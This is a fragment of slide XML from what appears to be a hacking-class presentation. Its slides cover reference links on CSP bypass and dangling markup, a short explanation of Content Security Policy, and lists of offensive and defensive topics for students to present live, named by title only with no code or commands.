                  <a:noFill/>
                </a:uFill>
              </a:rPr>
              <a:t>https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" dirty="0">
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
              </a:rPr>
              <a:t>://portswigger-labs.net/bypassing-csp-with-dangling-iframes/attacker.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-MY" dirty="0" smtClean="0">
              <a:uFill>
                <a:noFill/>
              </a:uFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-MY" dirty="0" smtClean="0"/>
              <a:t>Online Resource Learning</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-MY" dirty="0">
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
              </a:rPr>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" dirty="0" smtClean="0">
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
              </a:rPr>
              <a:t>book.hacktricks.xyz/pentesting-web/dangling-markup-html-scriptless-injection</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-MY" dirty="0">
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
              </a:rPr>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" dirty="0" smtClean="0">
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
              </a:rPr>
              <a:t>portswigger.net/web-security/cross-site-scripting/content-security-policy</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-MY" dirty="0">
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" dirty="0" smtClean="0">
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>javascript.info/</a:t>
            </a:r>
            <a:endParaRPr lang="en-MY" dirty="0" smtClean="0">
              <a:uFill>
                <a:noFill/>
              </a:uFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-MY" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="48FFD5"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://www.softwaretestinghelp.com/cross-site-scripting-xss-attack-test</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="48FFD5"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:endParaRPr lang="en-MY" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="48FFD5"/>
              </a:solidFill>
              <a:uFill>
                <a:noFill/>
              </a:uFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="177800" lvl="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-MY" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="48FFD5"/>
              </a:solidFill>
              <a:uFill>
                <a:noFill/>
              </a:uFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-MY" dirty="0" err="1" smtClean="0"/>
              <a:t>EliteGhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" dirty="0" smtClean="0"/>
              <a:t> Academy Hacking Class</a:t>
            </a:r>
            <a:endParaRPr lang="en-MY" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-MY" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-MY" dirty="0">
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
              </a:rPr>
              <a:t>https://www.eliteghost.com.my/</a:t>
            </a:r>
            <a:endParaRPr lang="en-MY" dirty="0">
              <a:solidFill>
                <a:srgbClr val="48FFD5"/>
              </a:solidFill>
              <a:uFill>
                <a:noFill/>
              </a:u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941114"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smtClean="0"/>
              <a:t>Content Security Policy (CSP)</a:t>
            </a:r>
            <a:endParaRPr sz="2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buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Content </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Security Policy (CSP) is an added layer of security that helps to detect and mitigate certain types of attacks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>,:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450">
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Cross-Site </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Scripting (XSS) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450">
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>injection attacks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450">
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>These Attacks used </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>for everything from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>data theft</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>site defacement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>malware distribution</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</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70" y="1480555"/>
            <a:ext cx="4297116" cy="225598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2760961" y="1422323"/>
            <a:ext cx="3449065" cy="3449065"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1874849" y="837548"/>
            <a:ext cx="5861370" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-MY" sz="3200" b="1" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Algerian" panose="04020705040A02060702" pitchFamily="82" charset="0"/>
              </a:rPr>
              <a:t>THANK YOU FOR LISTENING</a:t>
            </a:r>
            <a:endParaRPr lang="en-MY" sz="3200" b="1" u="sng" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>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62571"/>
            <a:ext cx="8520600" cy="15290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0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Attacking</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="es" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="es" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Choose 1 Topic To Demonstrate Live</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="219" name="Google Shape;219;p23"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6424513" y="2005350"/>
            <a:ext cx="18894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pPr>
            <a:r>
              <a:rPr lang="es" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Wifi WEP/WPA Cracking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Evil Twin Attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Blue Jacking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>RF Jamming</a:t>
            </a:r>
            <a:endParaRPr lang="es" dirty="0" smtClean="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24513" y="3015031"/>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MY" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Email &amp; SMS Spoofing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-MY" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Site Cloning</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-MY" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Piggybacking </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-MY" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Scareware</a:t>
            </a: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24513" y="3899943"/>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s" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Android Phone Hacking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Windows Machine Hacking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ruby Command Mac OS Hacking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Linux System Hacking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:endParaRPr lang="es" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:endParaRPr lang="es" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:endParaRPr lang="es" dirty="0" smtClean="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pPr>
            <a:r>
              <a:rPr lang="es" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>RAT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="es" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>File Sharing Worms</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="es" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Rootkit or Bootkit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="es" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Evasive Malware</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="es" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="es" dirty="0" smtClean="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pPr>
            <a:r>
              <a:rPr lang="es" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Session Hijacking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-MY" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HTTP Host </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Header Attacks</a:t>
            </a:r>
            <a:endParaRPr lang="es" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Directory Traversal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XSS Injection</a:t>
            </a:r>
            <a:endParaRPr lang="es" dirty="0" smtClean="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pPr>
            <a:r>
              <a:rPr lang="es" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SQL Injections</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Privilege Abuse</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Weak Authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Insecure System Architecture</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408670" y="2085751"/>
            <a:ext cx="2342600" cy="21102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Malware</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MY" dirty="0" smtClean="0"/>
              <a:t>Web Application</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Databases</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="234" name="Google Shape;234;p23"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle" idx="19"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6424513" y="198765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Wireless Hacking</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Social Engineering</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System Hacking</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="257" name="Google Shape;257;p23"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1711395"/>
            <a:ext cx="8520600" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="48FFD5"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none"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205" y="2711374"/>
            <a:ext cx="743245" cy="743245"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6983039" y="-57609"/>
            <a:ext cx="1849261" cy="184926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6295" y="1905049"/>
            <a:ext cx="665380" cy="66538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0565" y="3713470"/>
            <a:ext cx="795885" cy="79588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4509" y="1852301"/>
            <a:ext cx="693390" cy="69339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0928" y="2744023"/>
            <a:ext cx="660552" cy="660552"/>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7237" y="3713548"/>
            <a:ext cx="693104" cy="693104"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="904732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62571"/>
            <a:ext cx="8520600" cy="15290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0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Defensive</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="es" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="es" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Choose 1 Topic To Present Live</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="219" name="Google Shape;219;p23"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6424513" y="2005350"/>
            <a:ext cx="1889400"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MY" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
